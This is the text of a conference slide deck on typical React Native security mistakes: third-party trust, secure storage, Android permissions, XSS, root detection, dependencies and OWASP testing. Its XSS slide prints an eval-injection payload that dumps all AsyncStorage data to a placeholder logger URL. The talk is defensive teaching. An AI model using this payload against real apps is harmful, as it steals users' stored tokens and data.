React Native Security

Name Surname
Sed ut perspiciatis unde omnis iste
natus error sit voluptatem
accusantium doloremque
laudantium
Sed ut perspiciatis unde omnis iste natus error sit
voluptatem accusantium doloremque laudantium
something.org
Julia Potapenko
React Native Security

Addressing Typical Mistakes
Let's shed light on React Native apps’ security and
explain some risks and threats developers should
address to prevent typical mistakes.
@julepka cossacklabs.com

View Slide

Name Surname
Sed ut perspiciatis unde omnis iste
natus error sit voluptatem
accusantium doloremque
laudantium
Sed ut perspiciatis unde omnis iste natus error sit
voluptatem accusantium doloremque laudantium
something.org
Julia Potapenko
About me 👩💻
Security Software Engineer at Cossack Labs

Leader of OWASP Zhytomyr Chapter, Ukraine 🇺🇦

❤︎
OWASP MASVS/MSTG Project
@julepka cossacklabs.com
We help companies to protect their
sensitive and valuable data.

View Slide

React Native Security.

Addressing Typical
Mistakes
We will talk about
Architecture

Platforms usage

Dependencies

Security testing

View Slide


Addressing Typical
Mistakes
“Choosing React Native and its components
means that you understand and accept
potential security consequences.”

View Slide


Addressing Typical
Mistakes
Architecture basics
React Native is a cross-platform solution from Facebook that
allows writing native apps using React (JavaScript or
TypeScript).

View Slide


Addressing Typical
Mistakes
Trusting third parties
Native platforms = Apple and Google

React Native = Facebook

TypeScript = Microsoft

View Slide


Addressing Typical
Mistakes
Trusting third parties
Native platforms = Apple and Google

React Native = Facebook

TypeScript = Microsoft CVE-2020-1911

CVE-2020-1912

CVE-2020-1913

View Slide


Addressing Typical
Mistakes
“With React Native, developers deal with
security for all three platforms: iOS, Android
and React Native.”

View Slide


Addressing Typical
Mistakes
OWASP Mobile

Top 10
#1

Improper Platform
Usage

View Slide


Addressing Typical
Mistakes
React Native is a leaky abstraction
@vixentael

View Slide

Secure Store Example
iOS Android
Keychain
SharedPreferences +
KeyStore
Data stored encrypted Yes Yes

Addressing Typical
Mistakes

View Slide

Secure Store Example
iOS Android
Keychain
SharedPreferences +
KeyStore
Data stored encrypted Yes Yes
Data persists across app
reinstalls
Yes No
Hardware-backed
encryption
Yes
Depends on device
vendor
Data decrypted only
before usage
Decrypted when device
unlocked
Yes

Addressing Typical
Mistakes

View Slide

Managing Android Permissions

Addressing Typical
Mistakes

View Slide


Addressing Typical
Mistakes
Android: You can add permissions in multiple files

+

React Native: It is common practice to use third-party
solutions

View Slide


Addressing Typical
Mistakes
Android: You can add permissions in multiple files

+

React Native: It is common practice to use third-party
solutions

=

💥🤯💥
I don’t need this permission
The app crashes if I delete it

View Slide

Is XSS possible?

Addressing Typical
Mistakes
XSS possibility is decreases by design.

View Slide

Is XSS possible?

Addressing Typical
Mistakes
XSS possibility is decreases by design.

XSS is still possible.
eval()
_reactNative.AsyncStorage.getAllKeys(function(err,result)
{_reactNative.AsyncStorage.multiGet(result,function(err,result
)

{fetch(‘http://example.com/logger.php?token='+JSON.stringify(result));});});
Steal all the data from local storage (AsyncStorage) by exploiting eval-
based injection and accessing React Native APIs

View Slide

Jailbreak and Root detection

Addressing Typical
Mistakes
It is never easy for regular iOS and Android teams.

View Slide


Addressing Typical
Mistakes

There are no ready to go React Native solutions:

a. implement on your own

b. use third-party solutions for each platform and write bridging code

View Slide


Addressing Typical
Mistakes

There are no ready to go React Native solutions:

a. implement on your own

b. use third-party solutions for each platform and write bridging code

Example: IOSSecuritySuite https://github.com/securing/IOSSecuritySuite

Swift ➤ Objective-C ➤ React Native

View Slide


Addressing Typical
Mistakes
“50 shades of dependencies”

View Slide

A typical situation

Addressing Typical
Mistakes

View Slide

A typical situation

Addressing Typical
Mistakes
They’ve updated dependencies half year later…

View Slide

Monitoring dependencies

Addressing Typical
Mistakes
🤯
So many dependencies
Additional CI work
One update triggers another update
Integrating dependency checkers
Updates may be incompatible
What if there is no fix for vulnerability?
Architectural changes required
Tight deadlines

View Slide

What if there is no fix?

Addressing Typical
Mistakes
✅ Learn more about the issue, its scope

✅ Document it, make the team aware

✅ Monitor it and book the time for the update

View Slide

Plan time carefully!

Addressing Typical
Mistakes
➡ iOS or Android update

➡ React Native update

➡ Forked version update

➡ Dependencies update

➡ Mobile app source code update

View Slide


Addressing Typical
Mistakes
Security testing of React Native apps

View Slide


Addressing Typical
Mistakes
OWASP MASVS
Mobile Application Security Verification
Standard

https://github.com/OWASP/owasp-masvs

Mobile Security Testing Guide

https://github.com/OWASP/owasp-mstg
OWASP MSTG

View Slide


Addressing Typical
Mistakes
OWASP MASVS
Mobile Application Security Verification
Standard

https://github.com/OWASP/owasp-masvs

Mobile Security Testing Guide

https://github.com/OWASP/owasp-mstg
OWASP MSTG
“Please note that the MSTG focuses primarily
on native apps. These are apps built with
Java or Kotlin using the Android SDK for
Android or built with Swift or Objective-C
using the Apple SDKs for iOS. Apps using
frameworks such as Nativescript, React-
native, Xamarin, Cordova, etc. are not within
the main focus of the MSTG. However, some
essential controls, such as certificate pinning,
have been explained already for some of
these platforms.”

View Slide

You can still use MASVS!

Addressing Typical
Mistakes
OWASP MASVS is language agnostic. All requirements are relevant
for React Native apps because they are “native” under the hood.

View Slide


Addressing Typical
Mistakes
General ideas will be similar. You either look for similar JavaScript
implementation or native code with bridging functions.
You can still use MSTG!

View Slide

How do we test RN app security?

Addressing Typical
Mistakes
1. Use MASVS requirements.

2. Review JavaScript dependencies’ source code to understand
native controls behind it.

You need to be able to read all the languages: JavaScript
(TypeScript), Objective-C (Swift), Java (Kotlin).

3. Use ASVS and WSTG to cover JavaScript-specific vulnerabilities
like XSS.

View Slide

Final thoughts…

Addressing Typical
Mistakes
“Learn once, write anywhere.”

View Slide

Final thoughts…

Addressing Typical
Mistakes
“Learn once, write anywhere.”
“Learn once, ask mobile security
people for help.”

View Slide

Where to go next?

Addressing Typical
Mistakes
My React Native Security Article

https://www.cossacklabs.com/blog/react-native-app-security.html

React Native Security Guide

https://reactnative.dev/docs/security

OWASP MASVS Hybrid Apps discussion

https://github.com/OWASP/owasp-masvs/discussions/557

View Slide

Thank you!

@julepka

View Slide

React Native Security

React Native Security

Julia Mezher

More Decks by Julia Mezher

Other Decks in Programming

Featured

Transcript